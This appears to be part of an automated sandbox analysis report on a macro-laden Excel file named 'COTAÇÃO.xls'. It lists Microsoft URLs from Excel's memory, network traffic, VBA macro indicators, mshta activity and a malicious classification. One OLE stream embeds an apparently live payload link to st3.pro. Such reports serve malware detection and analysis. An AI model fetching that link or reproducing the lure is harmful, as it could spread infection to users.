Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.co
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133722863.00000121DF038000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/connectors0
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/connectors00
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/ews/exchange.asmx
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/owa/wopibootstrapperNA
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pagecontentsync.onenote.com/pagecontentsync/attachment/v1nc/attachment/v1
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pages.store.office.com/review/query3
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pages.store.office.com/review/queryate
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://partnerservices.getmicrosofhtC
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions2
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pbsub.microutx
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonce
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json2=DE
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pptcs.officeapps.live.com/pptauto/PowerpointAutomation.svc/PptAutomationys
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pptservicescast.officeapps.live.com/SpeechHandler.ashx
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pptsgs.officeapps.live.com/pptsgs/PowerpointSuggestion.svc/OutlineToPPT/Traceef
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pptsgs.officeapps.live.com/pptsgs/PowerpointSuggestion.svc/PptSuggestionSystemCertificates
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectoryZF
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod.support.office.com/InAppHelp
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod.support.office.com/InAppHelp%=3F87a
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://profile.live.com/cid-%s/d-%s/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://profile.live.com/home/home
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://realtimesync.onenote.com/realtimechannel/v1.0/signalr/hubv1.0/signalr/hubB
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/mro1cdnst
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41
Source: EXCEL.EXE, 00000000.00000002.4111169327.00000121CA5D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/flatfontassets
Source: EXCEL.EXE, 00000000.00000002.4111169327.00000121CA5B5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/office-growth/resources/programmablesurfaces/content/assets/office/wxp-wi
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/office-growth/resourcess
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/polymer/models
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/polymer/modelsapi/0
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://revere.osi.office.net/api/v
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133722863.00000121DF038000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://safelinks.protection.outlook.com/api/GetPolicy
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://safelinks.protection.outlook.com/api/GetPolicy=
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://secure.sharefile.com/oauth/oauthcompl
Source: EXCEL.EXE, 00000000.00000002.4109450255.00000121C81BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://send-to-kindle-word-win32.office.com/
Source: EXCEL.EXE, 00000000.00000002.4109450255.00000121C81BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://send-to-kindle-word-win32.office.com/?status=failedn
Source: EXCEL.EXE, 00000000.00000002.4109450255.00000121C81BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://send-to-kindle-word-win32.office.com/?status=succeeded
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sf-wopi2-sharefile-useast.sharefile.com/service/3
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://shredder.osi.office.net/ShredderService/web/desktop/views/main.cshtmltmlZ
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://skyapi.live.net/Activity/
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://st3.pro/
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://st3.pro/g
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://staging.cortana.ai
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://staging.cortana.aiet/
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/e
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/evcuN
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assVuY
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustratiIu$
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133722863.00000121DF038000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustrations/win32/m365-device-desktop-dark-1
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA815000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://storage.azure.com/
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://store.office.com/client/consent.aspxx-
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://store.office.com/client/consentsideloading.aspxM
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/M365.Accessrs3sK
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/N
Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAFE1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/NotesClient3.
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/NotesFabrictions
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/imageB2/v1.0/me/image/resize%28width%3D384%2Cheight%3D384%2CallowResize
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryt
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistorytPrint
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/events
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/recommendationsest
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC01000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/recommendedDocuments
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/searchhistory
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/suggestions
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/userconfigHy
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/init/
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/query
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/sharingsuggestion
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/todob2/api/v11e
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comP
Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAFE1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/client/results?fullframe=yes
Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAFE1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/client/results?fullframe=yesh
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://syncservice.o365syncservice.com/
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://teams.cloud.microsoft/ups/global/
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://teams.cloud.microsoft/ups/global/authz
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://templates.office.com/templates-for-powerpoint?ocid=oo_toc_client_app_MARVEL_UPS_templates_go
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.htmlOffice
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://us-partner-integrations.egnyte.com/msoffice/authgate/interceptintegrations-staging.qa-egnyte
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://us-partner-integrations.egnyte.com/msoffice/wopibootstrapper?betad221f797-d1d1-4289-9a6d-d36
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://web.microsoftstream.com/video/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://web.microsoftstream.com/video/P
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://webshell.suite.office.com
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wopi.dropbox.com/wopibootstrapperyr8ricy1tm3biywaccount_info.write
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wopi.netdocuments.app/wopi/wopibootstrapperAP-QXT2JHXGread
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word-edit.officeapps.live.com/we/rrdiscove
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word-edit.officeapps.live.com/we/rrdiscove0000
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word-edit.officeapps.live.com/we/rrdiscovery.ashx
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wordcs.officeapps.live.com/wordauto/wordautomation.svc/wordautomationl
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wordcs.officeapps.live.com/wrdps/wordprint.svc/wrdprint
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wus2.pagecontentsync.
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wus2.pagecontentsync.onenote.com/pagecontentsync/attachment/v1nc/attachment/v1
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA22C64
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2es
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.box.com/https://odc.officeapps.live.com/odc/stat/images/sm/partner/box/logo16.pnghttps:/
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/https://odc.officeapps.live.com/odc/stat/images/sm/partner/Dropbox/plus16.pn
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/ow/msft/oauth_callbackwopi.dropbox.comwww.dropbox.comapi.dropbox.comhelp.dro
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.egnyte.com/https://odc.officeapps.live.com/odc/stat/images/sm/partner/egnyte/egnyte_logo
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/https://odc.offi
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/https://odc.officeapps.live.com/odc/stat/images/sm/g
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/calendar
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/contacts
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.netdocuments.com/c
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.netdocuments.com/https://odc.officeapps.live.com/odc/stat/images/sm/partner/NetDocuments
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/(f7
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/0r7
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/https://odc.officeapps.live.com/odc/stat/images/sm/officestore_16_2.pnghttps:
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/officeaddins/jotspypy
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/sync/notebooks/sharere
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/sync/pages/shared/d/t
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/sync/v1/invitationsns
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/sync/v1/membershipsps
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/sync/v1/pageses3
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/sync/v1/usersrs1
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/userinfo/v1/settingng
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/userinfo/v1/settings/IsFeatureEnabled/PremiumFeatureses
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/userinfo/v1/whoisis
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/whatsnext/Macac23
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/whatsnext/iOSOS02
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.sharefile.com/https://odc.officeapps.live.com/odc/stat/images/sm/partner/citrix
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.unicorn.
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yahoo.com/6
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yammer.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownHTTPS traffic detected: 13.107.246.76:443 -> 192.168.2.26:49943 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.76:443 -> 192.168.2.26:49944 version: TLS 1.2
Source: COTA#U00c7#U00c3O.xlsOLE indicator, VBA macros: true
Source: WER.4be0a932-1407-436a-8165-1e536490c761.tmp.xml.10.drOLE indicator, VBA macros: true
Source: COTA#U00c7#U00c3O.xlsStream path 'MBD006B205A/\x1Ole' : https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen07suB'4>Ob<"z@`etm_I]H!Lc^CGHKA5S<4,E#:euo*XaK1LvLBy9CH3JJKQ17Rk34HdztDkfKgrmsD8ayfpMkL7MDOhJneu8GV14DJPljyksSx4EVja5eSBmGcKSRZj8zsDmZS4LTcr4xlqIsedrY28TorcdYEiuCerxgKtEKj8Qb4fs5hOEPsa7BW10AprosvPmpourG5TFCoVW4mcid2gkhp6jbvweqSgHYEWunT9ch7wNde3vA*p*]TI9A`'STB+B
Source: WER.4be0a932-1407-436a-8165-1e536490c761.tmp.xml.10.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess token adjusted: SecurityJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7468 -s 4084
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA2D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBA.INSERT.VBp
Source: classification engineClassification label: mal56.expl.winXLS@10/17@4/4
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7468
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{0B5322E7-C1B7-4D6F-BA09-272848C35304} - OProcSessId.datJump to behavior
Source: COTA#U00c7#U00c3O.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
